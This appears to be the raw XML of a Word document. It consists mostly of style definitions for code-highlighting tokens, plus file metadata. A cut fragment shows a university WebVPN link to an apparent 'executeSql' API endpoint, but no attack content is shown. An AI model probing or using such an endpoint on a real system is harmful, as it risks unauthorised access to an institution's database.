  <w:style w:type="character" w:customStyle="1" w:styleId="BuiltInTok">
    <w:name w:val="BuiltInTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="008000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="DecValTok">
    <w:name w:val="DecValTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="40A070"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ControlFlowTok">
    <w:name w:val="ControlFlowTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:color w:val="007020"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialStringTok">
    <w:name w:val="SpecialStringTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="BB6688"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CharTok">
    <w:name w:val="CharTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SpecialCharTok">
    <w:name w:val="SpecialCharTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="4070A0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
    <w:name w:val="AttributeTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="7D9029"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
    <w:name w:val="ExtensionTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/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PreprocessorTok">
    <w:name w:val="PreprocessorTok"/>
    <w:basedOn w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="BC7A00"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="FirstParagraph">
    <w:name w:val="First Paragraph"/>
    <w:basedOn w:val="a0"/>
    <w:next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zmvpn.cczu.edu.cn/http/webvpnb4628df0d7b77a6d0f08dfc00aa8d59c2c964ac696c57b03b13c3b6f0ee2cb8c/yygj/form/defination/api/executeSq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WF</dc:creator>
  <cp:lastModifiedBy>rainfy Ma</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-06T09:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-16T07:52:00Z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6180E29376DF410BB392C8442E00B2DF</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYzIwZTZhMDNhZjczMmQ3NmYzNjdjYTY5NmUyZjc0ZDUiLCJ1c2VySWQiOiIxNDQ2NTIyNDE4In0=</vt:lpwstr>
  </property>
</Properties>
</file>